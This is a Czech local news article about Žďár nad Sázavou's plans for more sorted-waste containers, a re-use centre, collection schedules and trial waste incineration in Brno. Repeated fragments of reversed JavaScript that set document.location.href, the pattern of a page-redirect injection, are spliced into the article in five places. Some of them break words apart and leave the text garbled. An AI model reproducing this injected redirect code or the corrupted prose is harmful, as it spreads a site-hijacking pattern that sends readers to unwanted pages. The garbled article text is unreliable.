Rainbow page separator

Ve Žďáře přibudou kontejnery na tříděný odpad i re-use centrum

Středa, 3. listopadu 2021

Žďár nad Sázavou / Konkrétní odpadovou strategii do příštích let budou řešit žďárští zastupitelé. Kromě výše částky, kterou mají obyvatelé platit v příštím roce za svoz a zpracování komunálního odpadu, se bude jednat i o dalších způsobech, jak zintenzivnit třídění a snížit ve Žďáře množství vyprodukovaného směsného komunálního odpadu.
Jednou z možností je dovybavit měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dalšími kontejnerovými hnízdy na tříděné komodity, které má aktuálně 92 procent obyvatel v docházkové vzdálenosti do 200 metrů. I nadále se počítá s loni započatým čtrnáctidenním vývozem popelnic z ulic s rodinnými domky, zatímco ve zbytku města kontejnery na směsný odpad budou vyváženy jednou týdně. V plánu je i zřízení jednoho či více menších sběrných dvorů pro dotřídění zejména objemných odpadů, eventuálně jejich překládání ke zlepšení přepravy odpadu k dalšímu využití. Žďár nemá vlastní infrastrukturu pro nakládání s odpady – sběrný dvůr i svoz odpadu provozuje společnost AVE a Žďár disponuje pouze nádobami na tříděné odpady. Jinou varian[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou je vznik takzvaného re-use centra v některém ze dvorů, tedy místa, kam lidé odkládají funkční, ale jimi již nevyužívané věci, které se naopak mohou někomu dalšímu hodit.
Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že skládkování skončí v roce 2030 a do té doby se i nadále bude výrazně prodražovat, také Žďár už zkouší energetické využívání směsného odpadu – do brněnské spalovny firmy SAKO zkušebně pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovalo prvních 19 tun odpadu, přičemž na jednom svozu se oproti skládkování ušetřilo asi čtyři a půl tisíce korun. S brněnskou spalovnou má Žďár le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos nasmlouváno tisíc tun odpadu, přičemž aktuálně probíhá výběrové řízení na firmu, jež městu zajistí spalování směsného komunálního odpadu v dalších letech.